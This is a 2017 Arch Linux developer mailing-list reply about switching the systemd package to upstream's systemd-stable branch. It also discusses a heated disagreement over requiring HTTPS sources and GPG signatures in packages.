[arch-dev-public] switching to systemd-stable

Thu Jul 6 08:42:00 UTC 2017

Hi,

On 07/06/17 at 09:44am, NicoHood wrote:
> On 07/06/2017 09:12 AM, Bartłomiej Piotrowski wrote:
> > On 2017-07-06 02:11, NicoHood wrote:
> >> On 07/05/2017 12:10 AM, Christian Hesse wrote:
> >>> Dave Reisner <d at falconindy.com> on Sat, 2017/07/01 13:22:
> >>>> Hey all,
> >>>>
> >>>> This should be pretty much a no-brainer, but wanted to be sure I wasn't
> >>>> missing anything. Systemd upstream publishes a "systemd-stable" repo [1]
> >>>> which branches at each tag and cherry-picks backports. I'd like to
> >>>> switch our systemd package to this repo to avoid some of the duplication
> >>>> of work that Jan, Christian and myself have done in the past. The repo
> >>>> sees a bunch more activity than what our own backporting strategy has
> >>>> been, and I see that as a positive.
> >>>
> >>> Just a little heads-up... systemd 233.75-1 landed in [testing]. So give it a
> >>> try! ;)
> >>>
> >>> BTW, we had just one backported commit to be removed, so 74 new commits
> >>> landed in this package compared to 233-7. Let's hope this gives some benefit.
> >>>
> >>
> >> Systemd still does not use https sources. Regarding the recent
> >> discussion about tricking git about wrong tags and other evil stuff it
> >> is highly recommended to switch to https. Please do it in favor for all
> >> ArchLinux users security.
> >>
> >> Once more the reference:
> >> https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/torres-arias
> >>
> > 
> > Regarding the recent discussion:
> > 
> > https://lists.archlinux.org/pipermail/arch-dev-public/2017-July/028919.html
> > 
> > I really hoped I don't have to put "NicoHood" on top to make you realize
> > it's addressed to you. Please do it in favor for all Arch Linux packagers.
> > 
> 
> What are you blaming me for now? This is a package everyone must install
> and you are telling me we have other serious problems? Sure we have, but
> compared to the time it takes to add an "s" to "http" this is a simple
> excuse. And this is not about checksums man, this is about https where
> even gpg signatures by git can be tricked.

I believe that a large group of Dev/Tu's do believe that security is a
serious issue and that we should put some effort into security. And I
can't thank everyone enough who has done a lot of work for example for
the Security Tracker. A few people have worked hard, without much
complaining and realy made a difference.

For the whole signing issue we have a todolist for GPG signatures and
never decided as far as I know on the sha256 or sha512 (or any poison)
sums. Yet there is one individual in our community who keeps harassing
(yes it's called harassment) Dev/Tu's to get GPG / HTTPS in PKGBUILD's.

I would appreciate it if the discussion regarding GPG sigs etc,
would be less dramatic. I'm kinda done with these requirements if I keep
getting bugged that it's missing md5sums, https while I have a GPG sig.
Calling out people, bugging them, isn't really the method to get things
done.

Note that this is my personal opinion, I surely do not speak for Arch as
a whole. 

> And yes, I am doing stuff in the background. I wrote a guide and a tool
> that simplifies source code signing[1] and I am doing a detailed
> security analysis on all ArchLinux packages. And once it is ready I will
> request gpg signatures from every upstream source, especially packages
> from [core].

I appreciate the effort of contacting upstream about providing GPG
signatures, that's really great!

-- 
Jelle van der Waa
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 488 bytes
Desc: not available
URL: <https://lists.archlinux.org/pipermail/arch-dev-public/attachments/20170706/ddebcc92/attachment.asc>